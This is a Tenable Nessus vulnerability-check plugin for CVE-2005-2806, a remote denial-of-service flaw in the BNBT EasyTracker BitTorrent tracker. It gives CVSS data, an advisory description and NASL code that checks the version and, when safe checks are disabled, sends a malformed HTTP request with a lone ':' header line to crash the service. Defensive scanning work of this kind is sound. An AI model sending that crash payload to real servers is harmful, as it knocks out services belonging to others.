CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
EPSS
Percentile
88.2%
The remote host is running BNBT EasyTracker, a packaged BitTorrent Tracker Installer for Windows.
The remote version of BNBT EasyTracker fails to properly handle malformed HTTP requests, making it prone to denial of service attacks. An attacker can crash the application by sending a request with a header line consisting of only a ‘:’.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description) {
script_id(19548);
script_version("1.18");
script_cve_id("CVE-2005-2806");
script_bugtraq_id(14700);
script_name(english:"BNBT EasyTracker Malformed GET Request Remote DoS");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to denial of service attacks." );
script_set_attribute(attribute:"description", value:
"The remote host is running BNBT EasyTracker, a packaged BitTorrent
Tracker Installer for Windows.
The remote version of BNBT EasyTracker fails to properly handle
malformed HTTP requests, making it prone to denial of service attacks.
An attacker can crash the application by sending a request with a
header line consisting of only a ':'." );
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/409621" );
script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/08/31");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/29");
script_cvs_date("Date: 2018/11/15 20:50:21");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english:"Checks for malformed request denial of service vulnerability in BNBT EasyTracker");
script_category(ACT_MIXED_ATTACK);
script_family(english:"Denial of Service");
script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 6969);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:6969);
# Grab the initial page.
res = http_get_cache(item:"/", port:port, exit_on_fail: 1);
# If it looks like BNBT EasyTracker...
if ("<title>BNBT Tracker Info</title>" >< res) {
# If safe checks are enabled...
if (safe_checks()) {
pat = 'POWERED BY <a href="http://bnbteasytracker.sourceforge.net".+The Trinity Edition of BNBT - Build (.+) - Click';
matches = egrep(string:res, pattern:pat);
if (matches) {
foreach match (split(matches)) {
match = chomp(match);
ver = eregmatch(pattern:pat, string:match);
if (!isnull(ver)) {
ver = ver[1];
# nb: see <http://bnbteasytracker.sourceforge.net/changelog.php>
# for version numbers.
if (ver =~ "^(200[0-4]\.|[0-6]\.|7\.([0-6]r|7r3\.2004))") {
security_warning(port:port, extra:
"Nessus has determined the vulnerability exists on the remote host
simply by looking at the version number of BNBT EasyTracker
installed there");
exit(0);
}
break;
}
}
}
}
# Otherwise, try to crash it.
else {
r = http_send_recv_buf(port: port, data: 'GET /index.htm HTTP/1.1\r\n:\r\n\r\n');
# Shouldn't we call http_is_dead?
if (isnull(r)) {
security_warning(port);
exit(0);
}
}
}